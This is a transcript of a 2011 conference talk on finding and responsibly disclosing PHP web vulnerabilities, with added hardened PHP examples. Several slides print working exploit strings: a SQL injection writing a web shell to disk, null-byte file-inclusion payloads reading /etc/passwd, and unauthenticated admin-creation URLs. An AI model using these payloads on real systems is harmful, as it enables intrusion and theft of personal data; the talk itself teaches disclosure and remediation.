It's Vulnerable, Now What?: Three Diverse Tales of Woe and Remediation

Very few people in IT have the distinction of being considered a “security researcher” by title alone. Despite that designation, many of us run across security vulnerabilities every day and sometimes just go “ah, someone should report that!” rather than taking the initiative to wear the security researcher hat and handle it ourselves.

In this presentation I will cover three diverse situations of vulnerabilities that I ran across and how I went about getting them remediated. Situations include: a PII/PHI vulnerability in a SaaS application with 90,000 affected users; an open-source CMS SQL injection vulnerability (CVE-2010-4006); and a client’s web site that was riddled with vulnerability from a contractor’s poor programming practices.

If you’ve wondered what you as a system administrator, web developer, or general IT enthusiast should do in these kinds of situations, come hear real stories and learn from my actions and related mistakes! Learn about requesting a CVE, contacting vendors, 0-day vs. vendor-friendly disclosure, and more. The presentation will feature code snippets/exploitation of each vulnerability and include screenshots (where allowed) of the situations.

Mark Stanislav

February 11, 2011
Transcript

  1. It's Vulnerable… Now What?
    Three Diverse Tales of Woe and Remediation
    Mark Stanislav

  2. De-Facto Quote Slide
    Source: http://seclists.org/fulldisclosure/2011/Jan/397 ; it’s legit
    “Thank goodness the working exploit
    will remain as the ‘gold standard’ for
    cutting through the BS in the field of
    data security for the foreseeable future.”
    - Marsh Ray

  3. The More Hats The Better
    Day Job: Linux systems administrator
    Night Job: Adjunct lecturer at a university
    Boredom: Finding web app vulnerabilities
    Side Note: PHP programmer for ~10 years*
    * Quickly becoming a Ruby fiend

  4. PHP Vulnerability Primer
    Inputs That Get Owned:
    $_GET: Query Strings
        index.php?user=mstanislav
    $_POST: Form Submission
    $_COOKIE: Cookies
        Chocolate Chip -- nom nom.

  5. PHP Vulnerability Primer, cont.
    Common Attacks:
    Local File Inclusion (LFI)
    Show me your /etc/passwd file
    SQL Injection
    Show me your user table
    Authentication/Authorization Bypass
    Who needs a username or password?

  6. Tale #1 - On The Clock
    Scenario: A client hires a PHP
    developer to create a web site for their
    financial service company (Forex)
    Problem: Developer has no business
    writing a ‘Hello, World!’ application, let
    alone a web application handling credit
    card data

  7. Vulnerabilities Found
    Adjust ‘membership level’ of any account
    Reset account passwords to hardcoded default
    Change any user password to a desired value
    Delete all user accounts
    Retrieve ACH account information
    Retrieve all user account details
    Create an administrative user account

  8. Clown Shoes
    “Something or someone that is a total joke”
    Source: Urban Dictionary; it’s legit

  9. Code Review, Part #1
    Vulnerable Code
        function updateMembershipLevel() {
            list($level,$email) = GetVars('level','email');
            DB_query("UPDATE users SET membership_level = '$level'
                      WHERE email = '$email'");
        }
    Exploit
        foo.php?mod=user&req=updatelevel&level=100&[email protected]
    Why The Code Sucks
    • No authentication prior to allowing execution of updateMembershipLevel()
    • There is no audit trail for changes being made through this function
    • The code does not escape or sanitize the $_GET variables being passed

  10. Code Review, Part #2
    Vulnerable Code
        function updatePassword() {
            list($resetkey,$pass) = PostVars('resetkey','pass1');
            $html = ReadTemplate('password','password_email_form');
            $sql = "UPDATE users SET passwd = md5('".DB_escape_string($pass)."')
                    WHERE resetkey='$resetkey'";
            DB_query($sql);
            [...]
        }
    Exploit
        (shown as a screenshot in the original slide)
    Why The Code Sucks
    • Only the password input is escaped properly; the ‘resetkey’ $_POST input is not
    • The SQL doesn’t use parameterized statements to protect against SQL injection in general
    • No audit trail for when passwords are changed using this function

  11. Code Review, Part #3
    Vulnerable Code
        function insertUser() {
            if ((is_SuperUser()) && (isset($_SESSION['virtual_client_id']))) {
                $clientID = $_SESSION['virtual_client_id'];
            } else {
                $clientID = $_SESSION['client_id'];
            }
            list($first,$last,$email,$groupID,$passwd,$addr1,$addr2,$city,$state,$zip)
                = GetVars('first','last','email','group','passwd','addr1','addr2','city','state','zip');
            [...]
        }
    Exploit
        foo.php?mod=adminusers&req=insert&passwd=test&[email protected]&group=1
    Why The Code Sucks
    • The insertUser() method isn’t restricted from being available to unauthenticated site visitors
    • is_SuperUser() doesn’t affect arbitrary calls to add a user to the database
    • No sanitization or verification is done on any of the data passed in via $_GET variables
    • No audit trail for ‘who’ is adding a user; in this case, no one ;)
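The three code-review slides share the same root causes: no authentication before a state change, user input spliced into SQL text, and no audit trail. The following is an added example, not the contractor's code or a fix from the talk, showing how the first two functions look with those defects removed. It assumes a PDO connection in `$db`, a session that records the logged-in user's id and role, an `audit_log` table, and `resetkey_expires` / `passwd` columns; all of those names are assumptions for the example.

```php
<?php
// Added example (not the contractor's code): hardened versions of the two
// functions from slides 9 and 10. Assumes a PDO connection in $db, a session
// holding user_id and role, and an audit_log table (all assumed names).

function requireAdmin(): int {
    // Authentication AND authorization happen before any write is attempted.
    if (empty($_SESSION['user_id']) || ($_SESSION['role'] ?? '') !== 'admin') {
        http_response_code(403);
        exit('Forbidden');
    }
    return (int) $_SESSION['user_id'];
}

function auditLog(PDO $db, int $actorId, string $action, string $target): void {
    // Who did what, to whom, from where: the trail the original code lacked.
    $stmt = $db->prepare(
        'INSERT INTO audit_log (actor_id, action, target, ip, at) VALUES (?, ?, ?, ?, NOW())'
    );
    $stmt->execute([$actorId, $action, $target, $_SERVER['REMOTE_ADDR'] ?? '']);
}

function updateMembershipLevel(PDO $db): void {
    $actorId = requireAdmin();

    // Validate inputs against what the fields can legitimately hold.
    $level = filter_input(INPUT_GET, 'level', FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 0, 'max_range' => 100]]);
    $email = filter_input(INPUT_GET, 'email', FILTER_VALIDATE_EMAIL);
    if ($level === false || $level === null || $email === false || $email === null) {
        http_response_code(400);
        exit('Bad request');
    }

    // Parameterized statement: user data never becomes part of the SQL text.
    $stmt = $db->prepare('UPDATE users SET membership_level = ? WHERE email = ?');
    $stmt->execute([$level, $email]);

    auditLog($db, $actorId, 'update_level:' . $level, $email);
}

function updatePassword(PDO $db): void {
    $resetKey = $_POST['resetkey'] ?? '';
    $pass     = $_POST['pass1'] ?? '';

    // Reset keys are random hex tokens the site issued; anything else is rejected.
    if (!preg_match('/^[a-f0-9]{64}$/', $resetKey) || strlen($pass) < 12) {
        http_response_code(400);
        exit('Bad request');
    }

    // Look the key up with a bound parameter and require that it is unexpired.
    $stmt = $db->prepare(
        'SELECT id FROM users WHERE resetkey = ? AND resetkey_expires > NOW()'
    );
    $stmt->execute([$resetKey]);
    $userId = $stmt->fetchColumn();
    if ($userId === false) {
        http_response_code(400);
        exit('Invalid or expired reset key');
    }

    // password_hash() (bcrypt) instead of unsalted md5(); the key is single-use.
    $stmt = $db->prepare(
        'UPDATE users SET passwd = ?, resetkey = NULL, resetkey_expires = NULL WHERE id = ?'
    );
    $stmt->execute([password_hash($pass, PASSWORD_DEFAULT), (int) $userId]);

    auditLog($db, (int) $userId, 'password_reset', 'user:' . $userId);
}
```

The example keeps the slide's `$_GET` interface for `updateMembershipLevel()` so the comparison is direct; in practice a state-changing request belongs in a POST protected by a CSRF token. The same pattern (check the session, validate, bind parameters, log) applies to `insertUser()` on slide 11, where `is_SuperUser()` must gate the whole function rather than only the choice of client id.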

  12. Remediation
    Created an executive summary of the
    vulnerabilities, their associated impacts, and
    recommendations to resolve the issues.
    The developer was fired and a new one was
    hired, who fixed the issues (which I verified).
    Fun Fact: The developer who wrote this code
    uses the same code-base for 30+ sites currently
    online using the same framework...

  13. What’s a CVE?
    Common Vulnerabilities & Exposures
    “A CVE Identifier will give you a standardized
    identifier for any given vulnerability or
    exposure.” - MITRE CVE FAQ
    Only for packaged software offerings
    Ideally used in a ‘responsible disclosure’ process
    Keeps issues organized and easy to reference
    Helps to prevent duplication of vulnerabilities

  14. How Do I Get a CVE?
    1. Find the vulnerability -- score!
    2. Try and verify with the vendor what you’ve
       supposedly found: you could be wrong/late.
    3. Contact a CVE Numbering Authority (CNA)
    4. Ideally the vendor cares and fixes the issue
    5. Release your advisory with the CVE included
    6. Provide links of publication back to MITRE

  15. Tale #2 - The Community
    Scenario: Random PHP applications you find
    on SourceForge.net & FreshMeat.net
    Problem: Not everyone releasing free (as in
    GNU) or paid (as in $$$) software is a good
    programmer -- surprise!

  16. WSN Links SQL Injection
    Vulnerable Code
        Didn’t copy it down, but basically: the ‘namecondition’ and ‘namesearch’
        $_GET values allow for a SQL injection when combined to bridge existing
        SQL queries, which allows for exploitation
    Exploit
        search.php?namecondition=IS NULL)) UNION ((SELECT "system($_REQUEST[cmd]); ?>" INTO OUTFILE&namesearch=/var/www/exec.php&action=filter&filled=1&whichtype=categories
    Why The Code Sucks
    • Improper sanitization of $_GET inputs within some functions of the search
    • No explicit installation recommendation to prevent the MySQL FILE privilege
    • Side Note: foo.php?debug=1 turns on debugging in the default installation

  17. WSN Links Remediation
    CVE-2010-4006
    Vendor blacklisted ‘UNION’ within search
    queries as a ‘fix’ to the issue
    New version released 3 days after notification
    had occurred
    It would be better to actually fix all of the SQL
    injection bugs (yes, there are more) rather than
    using a bandage like a UNION blacklist
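The reason a keyword blacklist is a bandage is that `namecondition` is a SQL fragment chosen by the user, and an operator cannot be passed as a bound parameter. The fix is to let the user pick from a fixed set of fragments the application wrote itself and to bind only the search term. The following is an added example and not WSN Links' code; it assumes a PDO connection in `$db` and a `links` table with `id`, `name` and `url` columns.

```php
<?php
// Added example, not WSN Links' code. Assumes a PDO connection in $db and a
// links(id, name, url) table; both are assumptions for the example.

// The user may choose HOW to compare, but only from SQL fragments we wrote.
// Operators cannot be bound as parameters, so an allowlist (not a keyword
// blacklist) is the only safe option for this input.
const NAME_CONDITIONS = [
    'contains' => 'name LIKE ?',
    'starts'   => 'name LIKE ?',
    'equals'   => 'name = ?',
    'isnull'   => 'name IS NULL',
];

function buildNameFilter(string $condition, string $search): array {
    if (!array_key_exists($condition, NAME_CONDITIONS)) {
        throw new InvalidArgumentException('unknown name condition');
    }
    $sql = NAME_CONDITIONS[$condition];
    // Escape LIKE wildcards in the user's term so it cannot widen the match.
    $escaped = addcslashes($search, '%_\\');
    switch ($condition) {
        case 'contains': $params = ['%' . $escaped . '%']; break;
        case 'starts':   $params = [$escaped . '%'];       break;
        case 'equals':   $params = [$search];              break;
        default:         $params = [];  // 'isnull' takes no value
    }
    return [$sql, $params];
}

function searchLinks(PDO $db, string $condition, string $search): array {
    [$where, $params] = buildNameFilter($condition, $search);
    // The only SQL text reaching the database is ours; $search is bound.
    $stmt = $db->prepare("SELECT id, name, url FROM links WHERE $where LIMIT 100");
    $stmt->execute($params);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Usage in search.php (unknown condition names raise, which the page maps to 400):
// $rows = searchLinks($db, $_GET['namecondition'] ?? 'contains', $_GET['namesearch'] ?? '');
```

This also addresses the FILE-privilege bullet from the previous slide from the other side: even if an injection slips through, `INTO OUTFILE` only works when the application's database account holds the FILE privilege, so the account should be granted only the DML rights it needs on its own schema and nothing global.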

  18. Pointter CMS Authentication Bypass
    Vulnerable Code
        On all administrative pages:
        if (!isset($_COOKIE['auser']) or !isset($_COOKIE['apass'])) {
            header("location:index.php");
        }
    Exploit
        Simply create ‘auser’ and ‘apass’ cookies. The contents of the cookies don’t
        impact the exploitation as there is no verification of contents before ‘using’ the
        cookies as a valid authentication mechanism.
    Why The Code Sucks
    • There’s no reason to store a password cookie in the first place
    • A session cookie should be unique and encrypted
    • Blank cookies should never be used as a form of authentication
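Besides trusting cookie presence, the check above also never stops the script after `header()`, so the rest of the administrative page still executes for an unauthenticated visitor. The following is an added example, not Pointter's code, of the server-side session check that belongs on every administrative page; it assumes a PDO connection in `$db` and an `admins` table storing a `password_hash()` value, both assumptions for the example.

```php
<?php
// Added example, not Pointter's code. Replaces "are the cookies set?" with a
// server-side session that only a successful login can create. Assumes a PDO
// connection in $db and an admins(id, username, passwd_hash) table (assumed).

session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Strict']);
session_start();

function adminLogin(PDO $db, string $user, string $pass): bool {
    $stmt = $db->prepare('SELECT id, passwd_hash FROM admins WHERE username = ?');
    $stmt->execute([$user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    // password_verify() is constant-time; the hash never leaves the server.
    if ($row === false || !password_verify($pass, $row['passwd_hash'])) {
        return false;
    }
    session_regenerate_id(true);            // fresh id after the privilege change
    $_SESSION['admin_id'] = (int) $row['id'];
    $_SESSION['login_at'] = time();
    return true;
}

function requireAdminSession(): int {
    // The client holds only an opaque session id; the decision is server-side,
    // and the script terminates after the redirect instead of running on.
    if (empty($_SESSION['admin_id'])) {
        header('Location: index.php');
        exit;
    }
    return (int) $_SESSION['admin_id'];
}

function adminLogout(): void {
    $_SESSION = [];
    session_destroy();
}

// On every administrative page:
// $adminId = requireAdminSession();
```

The browser never receives a username or password cookie; it receives one random session identifier, flagged `HttpOnly`, `Secure` and `SameSite`, and the mapping from that identifier to an administrator lives only in server storage.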

  19. Pointter CMS Remediation
    CVE-2010-4332 & CVE-2010-4333
    Two separate products, same vulnerability
    No updates have been released to fix the issue
    Disclosure to vendor was met with legal threats
    and very funny dialog (you’ll see...)
    Vendor claims that the user should rename their
    admin folder to hide, erm... prevent the issue! =)

  20. The Swiss
    “Not as docile as you’d expect...”
    Source: Me; it’s legit

  21. E-Mail Outtakes!
    “We do not understand why you try to
    manipulate the softwares. I am sure that you are
    aware that it is illegal to do so.”
    “...it is not your duty to publish anything related
    about our softwares as long as we ask for it.”
    “What you are trying to do, is to find a security
    hole and publish it so that everyone can hack a
    system. This is the illegal part so be aware of
    this.”

  22. E-Mail Outtakes!, cont.
    “The illegal thing is to publish a security gap to
    show other people the way how to attack. That
    is the same as telling someone how to build a
    bomb.”
    “Of course, it could be made safer and we know
    how to do it. But we have designed the
    softwares so that renaming admin folder gives
    us less work.”

  23. Null-Byte Attack Primer
    PHP uses C functions for filesystem calls, and C
    reads a null byte as ‘end of string’
        include("/var/www/" . $_GET['file'] . ".php");
    Without a null byte, the ".php" suffix stays attached:
        index.php?file=../../../etc/passwd
        include("/var/www/../../../etc/passwd.php");
    With a null byte (%00), the suffix is cut off:
        index.php?file=../../../etc/passwd%00
        include("/var/www/../../../etc/passwd");

  24. Pulse CMS Local File Inclusion
    Vulnerable Code
        $page = $_REQUEST['p'];
        switch ($page) {
            case $page:
                include("includes/". $page .".php");
                break;
        }
    Exploit
        index.php?p=/../../../../../../../../../../../../../../etc/passwd%00
    Why The Code Sucks
    • This method of preventing LFI is easily defeated with magic_quotes_gpc disabled
    • There’s no sanitization or regex used to prevent LFI attacks
    • Null-byte attacks are a problem with PHP (C-based) and need to be considered
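The `switch ($page) { case $page: ... }` construct matches every value, so it provides no restriction at all. The following is an added example, not Pulse CMS code, of the interrogation the two slides call for: reject null bytes outright, restrict the page name to a tight character class so `../` cannot be formed, and finally confirm that the resolved path really lies inside the includes directory. The `includes/` directory name is the one on the slide; the `home` default is an assumption.

```php
<?php
// Added example, not Pulse CMS code. Maps the "p" request parameter onto a
// fixed set of page files instead of splicing it into include().

const PAGE_DIR = __DIR__ . '/includes';

function resolvePage(string $requested): string {
    // 1. A null byte can never be legitimate in a page name: PHP's C-level
    //    filesystem calls would stop reading at that byte (slide 23).
    if (strpos($requested, "\0") !== false) {
        throw new InvalidArgumentException('null byte in page name');
    }
    // 2. Tight character class: no slashes and no dots, so "../" cannot exist.
    if (!preg_match('/\A[a-z0-9_]{1,32}\z/', $requested)) {
        throw new InvalidArgumentException('invalid page name');
    }
    // 3. Defence in depth: realpath() collapses any remaining tricks (symlinks
    //    included) and the result must sit inside PAGE_DIR.
    $path = realpath(PAGE_DIR . '/' . $requested . '.php');
    $base = realpath(PAGE_DIR);
    if ($path === false || $base === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new InvalidArgumentException('page not found');
    }
    return $path;
}

// Front controller: an invalid name is a 404, never an include of something else.
$page = $_REQUEST['p'] ?? 'home';   // 'home' default is assumed for the example
try {
    include resolvePage($page);
} catch (InvalidArgumentException $e) {
    http_response_code(404);
    echo 'Page not found';
}
```

Step 2 alone already blocks the slide's payload; steps 1 and 3 are there so that the safety of the include does not rest on a single regular expression, which is the lesson of the "easily defeated" bullet above.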

  25. Pulse CMS Remediation
    CVE-2010-4330
    Vendor patched the current version immediately
    and then released a new version a few days later
    Null-byte attacks are a real problem and
    programmers need to program with them in mind
    File inclusion from a user-controlled variable
    should be heavily interrogated (regex/sanitization)

  26. Tale #3 - SaaS Gone Wrong
    Scenario: You sign-up for a gym membership
    Problem: Your gym’s online fitness integration
    web site has broken Single Sign-On causing
    massive PII/PHI leakage

  27. SSO “Bypass”
    Vulnerable Code
        Have no access to the company’s site code, but here’s my best guess...
        checkAuthentication($memberid, $gymid) {
            //Implement this later, kthx!
        }
    Exploit
        http://www.example.com/diff/partners/member_activate.aspx?memberid=[memberid_integer]&gymid=[gymid_integer]
    Why The Code Sucks
    • It didn’t require users to ‘sign-up’ for some of their data to be available
    • Complete SSO implementation failure
    • No one could have possibly tested/QA’ed this code before it was launched
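A partner hand-off link that carries only two sequential integers is, in effect, a password that anyone can guess. The following is an added example (the talk never saw the vendor's code, and this is not it) of the minimum a partner SSO hand-off needs: the gym's server signs the member id, gym id and an expiry with a secret shared with the fitness site, and the fitness site verifies that signature before showing anything. The secret, the `expires` and `sig` parameter names and the shared-secret arrangement are assumptions for the example; the URL is the one from the slide.

```php
<?php
// Added example, not the SaaS vendor's code. A signed, expiring hand-off link
// in place of bare integers. PARTNER_SECRET is a placeholder: in practice it is
// a per-gym secret loaded from configuration and shared out of band.

const PARTNER_SECRET = 'replace-with-per-gym-secret-from-config'; // placeholder

function makeActivationLink(int $memberId, int $gymId, int $ttlSeconds = 900): string {
    // Gym side: bind the ids to a short expiry and sign the whole tuple.
    $expires = time() + $ttlSeconds;
    $payload = "$memberId|$gymId|$expires";
    $sig = hash_hmac('sha256', $payload, PARTNER_SECRET);
    return 'https://www.example.com/diff/partners/member_activate.aspx?'
         . http_build_query(['memberid' => $memberId, 'gymid' => $gymId,
                             'expires' => $expires, 'sig' => $sig]);
}

function verifyActivationRequest(array $query): ?array {
    // SaaS side: every field must be present and well-formed before any lookup.
    foreach (['memberid', 'gymid', 'expires', 'sig'] as $k) {
        if (!isset($query[$k])) {
            return null;
        }
    }
    $memberId = filter_var($query['memberid'], FILTER_VALIDATE_INT);
    $gymId    = filter_var($query['gymid'], FILTER_VALIDATE_INT);
    $expires  = filter_var($query['expires'], FILTER_VALIDATE_INT);
    if ($memberId === false || $gymId === false || $expires === false) {
        return null;
    }
    if ($expires < time()) {
        return null;                       // link has expired
    }
    $expected = hash_hmac('sha256', "$memberId|$gymId|$expires", PARTNER_SECRET);
    // Constant-time comparison: a tampered or guessed link fails here, so a
    // sequential memberid on its own is worthless.
    if (!hash_equals($expected, (string) $query['sig'])) {
        return null;
    }
    return ['memberid' => $memberId, 'gymid' => $gymId];
}

// Gym side:   $url = makeActivationLink(12345, 7);
// SaaS side:  $who = verifyActivationRequest($_GET);
//             if ($who === null) { http_response_code(403); exit('Forbidden'); }
```

Verifying the signature only establishes that the gym vouched for this member; the activation page should still require the member to set their own credentials before any profile or medical data (slide 29) is rendered, which is the "sign-up" step the first bullet says was skipped.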

  28. Vulnerability Verification
    Script #1: Out of 10,000 sequential 'memberid'
    values roughly 2,700 accounts existed in either an
    'activated' or 'unactivated' state.
    Script #2: Of the 1,000 'memberid' values
    checked, 76 accounts were activated. One user
    profile had a picture, eight users had listed phone
    numbers, and at least one user had a medical
    questionnaire filled-out.

  29. Information Being Disclosed
    Unactivated Account: First Name, Last Name,
    Date of Birth, Gender, and E-Mail Address
    Activated Account: Photo, First Name, Last
    Name, Date of Birth, Gender, E-Mail Address,
    Phone Number, Height, Weight, Body Fat %,
    Timezone, Gym Membership Company,
    Workout Schedule, and Medical History (blood
    pressure issues, heart problems, recent surgery,
    pregnancy, diabetes, etc.)

  30. Remediation
    Contacted CEO (small company) with a report
    Lots of follow-up e-mails with increasing
    amounts of people (read: lawyers/execs) added
    Consistently reaffirmed my commitment to help
    and deflected any comments towards me being
    some kind of nefarious hacker
    Took three weeks after successful contact to
    have the issue actually fixed...

  31. Customers Notified
    90,000+

  32. But be careful...
    It’s a very thin line between committing a crime
    and just trying to help a web site with a problem
    Don’t make threats, don’t ‘force their hand’; be
    respectful, professional, and continuously affirm
    your desire to protect people and information
    Anyone can be sued at anytime for anything in
    our country -- it doesn’t mean you’re guilty, but
    you can certainly lose time and money this way
    Let your ethics and common sense lead you...

  33. Generalized Take-Aways
    Do the right thing, consistently, and people
    won’t have much room to actually threaten you
    Full-disclosure to the community helps to keep
    developers and businesses accountable for the
    products and services they offer
    Responsible disclosure allows you to make more
    friends than enemies; most people are really
    appreciative of your assistance
    Vulnerability research is tediously fun! ;)

  34. My Thoughts...
    Info Sec. is everyone’s responsibility
    Don’t accept an answer of “well, we didn’t build
    this with security in mind...”
    Ethics and information security are not, in my
    mind, allowed to be separated
    This isn’t about 1337 ‘sploits. It’s about
    protecting your business, your friends, your
    family, and yourself from unethical people

  35. Thanks...
    Jon Oberheide - Duo Security
    Steve Christy - MITRE
    Todd Jarvis - Packet Storm Security

  36. Contact
    E-Mail: [email protected]
    Twitter: @markstanislav
    Website: http://www.uncompiled.com